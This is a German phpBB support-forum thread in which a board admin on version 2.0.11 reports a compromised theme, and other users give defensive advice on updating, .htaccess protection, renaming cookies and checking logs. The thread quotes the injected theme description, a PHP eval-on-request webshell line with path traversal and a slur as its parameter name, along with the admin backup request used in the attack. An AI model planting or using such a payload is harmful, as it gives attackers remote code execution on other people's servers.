Wer oder was war das?

[smart]

Liebe Leute,
soeben habe ich einen ganz schönen Schock bekommen:

Mein Forum war plötzlich nicht mehr aufzurufen. Die Fehlermeldung bezog sich auf die "functions.php", das lag aber daran, dass diese sich bei Ausfall des Templates auf den SubSilver bezog, den ich zwar noch online hatte, jedoch in einem umbenannten Ordner. Nun gut: Ordner wieder umbenannt, unter SubSilver folgendes festgestellt:

Ich nutze sonst SubGreen, plötzlich "hieß" dieser aber "FI Black" (habe recherchiert, dass es auch den gibt - aber den habe ich NIE installiert!) und die Beschreibung lautete

Code: Alles auswählen

"aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp"

Kann damit irgendjemand etwas anfangen? Habe jetzt SubGreen einfach wieder neu installiert und alles geht - aber woher kommt dieser FI Black, was hat das Wort "nigga" dort zu suchen, warum tritt urplötzlich so ein Fehler auf und warum passiert das immer mir?

Bin ja mal gespannt, wer auf alle vier Fragen die passende Antwort liefern kann...
Drei reichen mir aber auch...

[Jan500]

gib mal url zu deinem Forum

Jan

[Christian Benz]

Hi,

welche Version läuft bei dir?

Gruß,
Chris

[larsneo]

welche version läuft bei dir, wie heisst der cookie und hast du den admin-bereich via .htaccess vor externen zugriff geschützt?

exploit siehe http://www.securityfocus.com/archive/1/ ... 05-03-17/0

[smart]

LINK zum Forum, Version 2.0.11. Mittlerweile läuft ja alles wieder - musste halt nur den Theme neu hinzufügen. Aber wüsste gerne, wie ich mich vor einem erneuten Ausfall schützen kann...

Sorry, larsneo, aber aus Deinem Link bin ich nicht schlau geworden... Was genau soll ich da machen? Geschützt ist nur das, was mit der neuesten Version geschützt ist - habe mich darauf verlassen, da nicht noch weitere Maßnahmen vorzunehmen. Wie genau gehe ich das mit der .htaccess denn an?

[Jan500]

da hat man schon das problem

Powered by phpBB 2.0.11 © 2001, 2002 phpBB Group

änder dein Passwort und guck ob du alleiniger Admin bist UND
mach ein update auf 2.0.13 !!!!

Jan

ps: das einige Leute aus anderen Fehlern nicht schlau werden

[larsneo]

1. auf die 2.0.13 aktualisieren
2. zum thema .htaccess für den /admin-ordner: http://www.phpbb.de/doku/kb/artikel.php ... t=htaccess

Zur Sicherheit können/sollten die Verzeichnisse /admin, /db und /includes mit Verzeichnisschutz (Apache: .htaccess-Dateien; s. Anleitung) geschützt werden.

3. cookie in der administration umbenamen

[smart]

Erst einmal DANKE!!!

Um ehrlich zu sein: Ich war ein paar Wochen nicht auf phpBB und habe gar nicht mitbekommen, dass es in der Zwischenzeit schon wieder Updates gab - habe ehrlich gesagt auch nicht damit gerechnet. Hatte einfach ein bisschen zu viel um die Ohren, die letzten Tage. Update wird sofort gemacht - was das Cookie angeht: Gesagt, getan.

LEUTE, ICH DANK' EUCH!

[larsneo]

btw: falls du zugriff auf deine logfiles hast, durchsuche sie doch bitte einmal nach

Code: Alles auswählen

admin/admin_db_utilities.php?perform=backup&additional_tables=&backup_type=
structure&drop=1&backupstart=1&gzipcompress=0&startdownload=1&sid=

[Nikochan]

Auch meine Board wurde gestern attackiert. Version war ebenfalls 2.0.11.

Der Angreifer (Wurm?) kam via Google auf mein Board. Ich habe mittlerweilen auf 2.0.13 upgedatet. Trotzdem finde ich es toll, dass Google noch gestern reagiert hat und den entsprechenden Suchbegriff gesperrt hat. Ein Update ist trotzdem zu empfehlen. Ausserdem habe ich noch einen .htaccess-Schutz eingebaut. Der Angriff zielt übrigens auf admin/admin_db_utilities.php. Die Logfiles habe ich, falls jemand weitere Details wissen möchte.

Gruss,
Nikochan